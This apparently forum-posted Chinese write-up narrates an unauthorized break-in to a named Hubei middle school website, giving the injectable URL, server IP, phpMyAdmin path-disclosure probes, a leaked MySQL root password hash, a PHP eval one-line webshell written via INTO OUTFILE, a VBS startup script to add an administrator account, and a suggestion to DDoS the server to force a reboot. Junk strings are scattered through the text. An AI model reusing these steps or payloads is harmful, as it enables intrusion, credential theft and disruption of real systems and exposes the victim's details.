友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


6 X- r( y7 Y. y9 u/ _
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

9 C; Y( H  d* P/ t5 [那么想可以直接写入shell ，getshell有几个条件：
" {7 J+ P' p0 y

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

% j" L  K0 K4 \( V% B" U试着爆绝对路径：
) w2 Z6 V* p* `1./phpMyAdmin/index.php?lang[]=1  
  w5 X9 J- O3 E- ?5 `2./phpMyAdmin/phpinfo.php  
7 y/ k! y3 k) y& Z+ A! P4 @3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
* N# r6 H% M4 Y5 G5 z! @8 J
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
) o$ p: W2 a3 u: x5 i" C" b
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
2 @( @- s, E( D
# i- b. j6 w# B想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
6 I5 e# L1 h  |9 ^. @& H
4 f& U! I* z' d7 @http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

% G, ^4 o7 a$ K0 a自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

' d8 f! g" a3 M* h" l5 H17---- r(0072)
18---- o(006f)
4 ]. A5 B( N! r% R19---- o(006f)
20---- t(0074)
/ Q8 W- t9 i& ~. L$ I21---- *(002a)
22---- 8(0038)
" [" ]/ C4 [" L% D23---- 2(0032)
24---- E(0045)
( m# y$ A& c$ |+ J# u2 T5 A25---- 1(0031)
26---- C(0043)
/ U) z) n# y9 K! O: f0 n  X! c9 a+ {27---- 5(0035)
! |. \5 C& o2 j$ M* z: R28---- 8(0038)
; c" I% {+ p. l+ I) J29---- 2(0032)
30---- 8(0038)
; B& r8 d/ u' l- q8 W6 V2 O31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
1 c4 A+ `9 h7 b; y37---- 6(0036)
7 ?8 ^- i: b! H38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
( U) ^! X/ F) j7 {; N, N5 H" R3 B4 ]42---- 5(0035)
+ {$ O9 H) d6 Z* K  [43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
3 y# ?8 [! T' t  ^% j& K46---- 8(0038)
0 s8 p) o, y% A. H7 K+ _/ L1 s! A47---- F(0046)
48---- F(0046)
& W( M' f& H2 O" [) R49---- 4(0034)
50---- F(0046)
51---- 0(0030)
52---- 3(0033)
6 O  A2 z) \. d5 p53---- 2(0032)
' S8 Y# z2 d' l* R8 G54---- A(0041)
55---- 4(0034)
2 E; \1 h5 V2 ^% J) _  C- }56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
60---- *(0041)
' I9 j3 x0 X/ w1 N3 i+ e61---- *0032)
2 ^) J9 t2 b: h# g& q1 u/ f
解密后成功登陆phpmyamin
  T: n" J. g! o) C/ C6 b% b                          

                             
# n4 E+ u) G3 n- [9 k' h
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
5 P: N& |& F9 h9 @1 l
+ \' b* n" R$ \$ ~% W成功执行，拿下shell，菜刀连接：

4 D7 k, Q, M8 a; Y2 ^; B+ ]& [服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

9 B6 m- T, l8 ?5 H: ]; S3 Z

成员

-------------------------------------------------------------------------------
admin
Administrator
slipper$
0 ~$ @8 d% _3 [sqluser
* k8 f- E( G2 b. V. y/ I9 z命令成功完成。

6 t& C% T2 ^! l- H, \7 |服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
' C* g9 @# P  d( s5 y  ^
. x2 {* }7 o$ r- u      

angel